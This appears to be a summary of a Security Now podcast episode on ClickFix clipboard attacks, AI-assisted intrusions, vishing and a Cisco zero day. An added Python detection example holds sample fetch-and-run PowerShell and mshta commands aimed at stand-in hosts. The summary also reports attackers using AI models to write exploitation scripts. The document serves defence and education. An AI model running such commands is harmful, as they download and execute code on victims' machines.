Security Now Episode 1067: KongTuk’s CrashFix - Click, Paste, Pwned (March 3, 2026)
Hosts: Steve Gibson (SG), Leo Laporte (LL)
Podcast: Security Now (TWiT Network)
EPISODE OVERVIEW
In this jam-packed episode, Steve Gibson and Leo Laporte break down a week of high-impact cybersecurity news, focusing especially on the rapidly evolving threat of click-fix exploits targeting Windows users. They also discuss the intersection of AI and cybercrime, new trends in social engineering voice phishing, high-profile vulnerabilities (notably from Cisco), and ongoing struggles between privacy laws and age verification requirements. The episode features sharp insights, technical breakdowns, lively banter, and user stories, all delivered with the show’s signature style.
KEY SEGMENTS & DISCUSSION POINTS
1. [00:00] - Episode Setting & Preview
- Context: Episode recorded early due to upcoming Zero Trust World conference.
- Steve’s Note: “If anything happens on Monday, it won’t be in the show till next week.”
- Main Topics Previewed: ClickFix exploits, AI social engineering, Lapsus$ Hunters recruiting women, major Cisco zero day, child safety legislation, age verification messes.
2. [12:50] - Picture of the Week
- Description: An “old school” solution to kids blasting the stereo: Dad installs a physical screw into the volume knob to prevent it from turning up past a certain point.
- Memorable Steve Quote:
“Regardless of the backstory, this is someone’s determined effort to prevent the volume control from being turned up very far.” [13:51]
- Listener Feedback: Some suggest a ‘security screw’ for extra effectiveness.
- Verification of Last Week’s Viral Intersection Signage: It was genuine, from Simcoe, Norfolk County, Canada. The story became a local embarrassment after a photo went viral.
3. [18:17] - AI-Driven Hacking Campaigns
Fortinet Incident:
- Key Facts:
- Over 600 Fortinet firewalls breached.
- Attackers used commercial AI toolkits (Claude & DeepSeek) to generate scripts for reconnaissance and exploitation.
- No zero-days: Instead, exploited devices with public management interface, weak passwords, no MFA.
- Steve’s Point:
“There’s no reason to expect AI to be able to discriminate between the two. ... AI should not receive any of the blame for the way its creators, we humans, choose to use it.” [24:04]
- Leo’s Take:
“As usual, it’s the humans who are the problem.” [24:40]
Mexican Government Data Breach
- Attacker used AI (Claude) to automate breaches of tax authority and electoral institute, impacting millions.
- Steve’s Advice:
“Should we care at all that AI was employed in these attacks? No.” [25:47]
- Clickbait Warning: News outlets overhyped the “AI” factor for clicks; in reality, it’s just a new (powerful) tool in both good and bad hands.
4. [27:11] - Tech Industry & Privacy Law Collision
Apple’s Response to Age Restriction Laws:
- Global Patchwork: Apple scrambles to comply with rapidly fragmenting age verification requirements across Brazil, Australia, Singapore, Utah, and Louisiana.
- API Updates: Apple is rolling out a “Declared Age Range API” to assist app developers, but warns that regulatory language is vague and implementation highly fragmented.
- Steve’s View:
“You’re going to need a whole new building at Apple in order to figure out what to do for who on what day … what a mess.” [32:09]
COPPA Exceptions for Age Verification (FTC):
- Summary: The US FTC confirmed it will not take enforcement action under COPPA if personal information is collected solely for age verification, as long as strict conditions are met.
- Steve’s Commentary:
“One piece of legislation colliding with another. Surprise.” [37:17]
Meta’s AI & CSAM Detection Floods Law Enforcement:
- Problem: Meta’s AI generates millions of “tips” for suspected child abuse material, most of which are unviable or missing crucial evidence for police.
- Law Enforcement Complains:
“We’re drowning in tips... we want to get out there and do this work. We don’t have the personnel to sustain that.” [59:03]
- Steve’s Insight:
“It’s less Meta being evil ... than the growing pains of effective AI deployment.” [59:57]
- Regulatory Pressure: The move is, in part, to avoid breaching new US reporting laws, resulting in much more noise than signal.
5. [60:00] - VPN & Information Control in Russia
- Russia's Internet Watchdog (Roskomnadzor) blocks 469 individual VPN services.
- Telegram to be fully blocked by April (currently only “55% blocked”).
- Steve’s Point:
“This is a citizenry that is desperate for contact with the outside world and a repressive government doing everything it can to prevent that.” [61:17]
6. [62:28] - UK’s Public Sector Vulnerability Scanning
- New service scans 6,000 public bodies for vulnerabilities, claims 84% faster fixes.
- Press Release Lingo Critiqued: Steve calls out “nonsense” about ‘weak DNS records,’ questions the technical validity of some government statements.
- Core Takeaway: Centralized, continuous scanning and notification is a good idea—even if the implementation and communication are a work in progress.
7. [82:17] - Notorious Old/New Attacks & Social Engineering
Vastamo Psychotherapy Hack Update (Finland):
- Background: 2020 hack & extortion of therapy patients; attacker’s sentence recently extended.
- Steve’s Reminder: Clinics should not keep old sensitive data “in hot storage online ... all of which this hacker sucked up.” [84:53]
Scattered Lapsus$ Hunters—Actively Recruiting Women for Voice Phishing
- Group offers $500–$1,000 upfront per call and scripts for “voice phishing” (vishing) campaigns, particularly targeting corporate IT help desks.
- Steve’s Security Tips:
- Brief IT help desk staff on female social engineering attempts
- Enforce strong, out-of-band identity verification
- Move to hardware MFA (FIDO2), monitor logs post-interaction
- Leo’s Anecdote:
Social engineering using frantic callers, baby sounds, and emotional manipulation:
“They played a baby crying in the background ... it was a whole scenario.” [89:42]
8. [90:17] - Security News: Cisco & Vulnerability Trends
Cisco SD-WAN Major Zero Day (CVE-2026-20127)
- Authentication bypass—CVSS 10.0—‘breathtakingly rare.’
“This one is so bad that both the US NSA and CISA … [and] Australia, Canada, New Zealand, UK all published patch-or-perish announcements.” [91:55]
- Steve’s Security Principle:
“You cannot rely upon authentication.... you have a bunch of offices scattered around … Why not put a rule in the firewall … only accept incoming traffic from that IP to your SD-WAN?” [96:43]
VulnCheck 2025 Vulnerability Report Teaser
- Key Insight: Only 1% of disclosed vulnerabilities are actively exploited, but those exploited cause outsized damage.
- AI Impact:
“AI proof-of-concept code is polluting risk assessment pipelines.... AI slop is a term which has taken hold.” [98:44]
9. [104:58] - Listener Feedback: Code Signing Monopoly & Hardware Solutions
- Q: Why not just self-sign software?
- Steve’s Deep Dive:
- Self-signing works only for your own/local use—won’t be trusted by Windows and users unless they manually trust your cert (which is impractical and unsafe for general distribution).
- Industry Consolidation: Most code-signing CAs are “just resellers for DigiCert.”
- Hardware Revolution: Found open source, multi-platform, $72 “smartcard-hsm.com” USB devices that allow secure, flexible code signing across multiple machines.
- Enterprise Use Case: Internal orgs may use self-signed certs with their own trusted root, but this isn’t practical for public distribution.
- Memorable Quote: “I don’t see any way to break our certificate authorities’ stranglehold on developers for code signing that needs to be universally trusted.” [113:21]
- Local AI Assistants for Security: Listener suggests using small local language models (like Charlemagne) to monitor users’ actions, warn against risky behaviors.
- Steve:
“I love the idea ... of some form of active client side local AI agent that ... interposes itself between the user’s actions and the computer system.” [124:31]
FEATURED SEGMENT
[133:56] - MAIN TOPIC: KongTuk’s CrashFix (Click, Paste, Pwned)
The Latest Evolution of Click-Fix Exploits
- Attack Vector: Malicious browser extension (“Next Shield”), disguised as uBlock Origin Lite, offered via an ad in Chrome Web Store.
- How It Works:
- Victim seeks ad blocker, installs “Next Shield.”
- After normal browsing, a fake but convincing “Microsoft Edge has stopped abnormally” pop-up appears.
- Victim clicks “Run Scan,” then is instructed to:
- Win+R (open Run dialog)
- Ctrl+V (paste clipboard)
- Enter
- Clipboard had already been primed with a PowerShell command, which is run with full permissions.
- For Enterprise Devices: Different infection chain, aimed at domain-joined systems (targeting Active Directory, lateral movement).
- Home Users: Infection chain under active development.
- Steve’s Analysis:
- “The malware community at large has stumbled upon a fundamental security weakness of Microsoft Windows, which is its users’ comparatively script-following level of understanding of Windows when set against Windows’ increasing power and sophistication.” [142:32]
- “There’s only one possible ending to this trouble.... The system’s clipboard needs to be handled. Contents that were sourced by any web browser need to be quarantined.” [144:46]
- Recommendation: Microsoft must act at the OS level, as only an integrated Windows update can sufficiently protect average users from this class of highly effective, cross-browser exploits.
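A defender-side illustration of the Run-dialog/clipboard chain described above, added here as an example (not code from the episode or from GRC): a small Python scorer over constructed Sysmon-style process-creation events that flags a script host launched directly under explorer.exe (the Win+R pattern) together with command-line traits typical of pasted one-liners. The sample events, the indicator list and the threshold are assumptions for illustration.

```python
import re

# Constructed sample events modelled on Sysmon Event ID 1 (process creation);
# illustrative input for this example, not logs from the episode.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (iwr http://example.invalid/s)"'},
    {"ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -File build.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://example.invalid/fix.hta"},
]

# Script hosts a pasted one-liner typically invokes (assumed list).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Command-line traits that are individually common but rarely combined in benign use.
INDICATORS = [
    (r"-w(indowstyle)?\s+hidden", "hidden window"),
    (r"-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
    (r"\b(iex|invoke-expression)\b", "invoke-expression"),
    (r"\b(iwr|invoke-webrequest|downloadstring|curl)\b", "remote download"),
    (r"-e(xecutionpolicy|p)\s+bypass", "execution policy bypass"),
    (r"https?://", "URL in command line"),
]

def score_event(event: dict) -> tuple[int, list[str]]:
    """Return (score, reasons) for one process-creation event."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    if image not in SCRIPT_HOSTS:
        return 0, []
    reasons = []
    # Win+R spawns the child directly under explorer.exe; scripted PowerShell
    # use normally has another parent (IDE, scheduler, installer).
    if event["ParentImage"].rsplit("\\", 1)[-1].lower() == "explorer.exe":
        reasons.append("script host spawned by explorer.exe (Run-dialog pattern)")
    for pattern, label in INDICATORS:
        if re.search(pattern, event["CommandLine"], re.IGNORECASE):
            reasons.append(label)
    return len(reasons), reasons

def find_clickfix_candidates(events: list[dict], threshold: int = 2) -> list[tuple[int, list[str]]]:
    """Return (event index, reasons) for every event scoring at or above threshold."""
    hits = []
    for i, event in enumerate(events):
        score, reasons = score_event(event)
        if score >= threshold:
            hits.append((i, reasons))
    return hits
```

Run over the constructed events, the pasted PowerShell one-liner and the mshta launch are flagged while the IDE-launched build script is not; in production the same scoring would be applied to your EDR or Sysmon feed and tuned against known-good parents.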
NOTABLE QUOTES & MEMORABLE MOMENTS
- Steve, on AI and responsibility:
“AI should not receive any of the blame for the way its creators, we humans, choose to use it. It’s a tool and nothing more.” [24:08]
- Leo (re: privacy law):
“This is what Meta wanted, by the way — they didn’t want to do it, so they said, make Apple do this.” [32:40]
- Steve, on help desk social engineering:
“If it’s a girl on the phone, doesn’t mean it’s not your typical hacker attacker guy. Don’t be fooled by that.” [87:38]
- Steve, on code signing market:
“The world no longer has a competitive certificate authority industry. We are watching the formation of a monopoly that has the gall to charge its customers per signature.” [112:38]
- Leo (on modern OS complexity):
“Basically you’re running a machine you don’t understand the operation of at all. And really today, who among us does?” [147:34]
TIMESTAMPS FOR IMPORTANT SEGMENTS
| Timestamp | Segment/Topic |
|--------------|------------------------------------------------------------|
| 00:00–03:30 | Episode preview & context, upcoming Zero Trust World |
| 12:50–15:50 | Picture of the Week: Volume knob hardware hack |
| 18:11–26:00 | AI in hacking: Fortinet, Mexican government, & analysis |
| 27:11–36:00 | Apple & Meta: Laws, COPPA, reporting, AI slop |
| 60:00 | VPNs & Internet controls in Russia |
| 62:28–70:09 | UK public sector vulnerability scanning—press release talk |
| 82:17–90:17 | Vastamo psychotherapy hack update; Lapsus$ female vishing |
| 90:17–98:44 | Cisco SD-WAN zero day; VulnCheck 2025 vulnerability report |
| 104:58–124:31 | Listener feedback: code signing monopoly, smart HSMs, local AI security agents |
| 133:56–146:41 | Main feature: KongTuk’s CrashFix/new ClickFix exploit |
ACTIONABLE SECURITY TAKEAWAYS
- ClickFix & Clipboard Exploits: Warn users never to follow instructions to paste and run unknown clipboard content—especially from browser popups.
- Attack sophistication: Attackers use convincing fake security popups, cloned extensions, PowerShell; targeting both home and enterprise users.
- Defensive Mechanisms:
- IT: Educate and rehearse help desk staff on social engineering red flags.
- Implementation: Move off SMS/push-based MFA. Prefer hardware tokens (FIDO2).
- Logging: Monitor for anomalous access post-help desk calls.
- Call for Vendor Responsibility: Microsoft must address clipboard-as-exploit risk natively in Windows.
- AI Security Tools: Consider deploying local, small language model agents to protect end users against phishing and social engineering.
- Critical Patch Management: Watch for urgent patches, especially for widely exploited authentication-bypass vulnerabilities like Cisco’s SD-WAN.
- Code Signing:
- Developers: Use CAs with hardware modules, but beware of market consolidation.
- Enterprises: Internal self-signed certs may be viable within strictly controlled environments.
End of Summary – For full details, technical links, and visuals: Read Steve’s show notes at grc.com.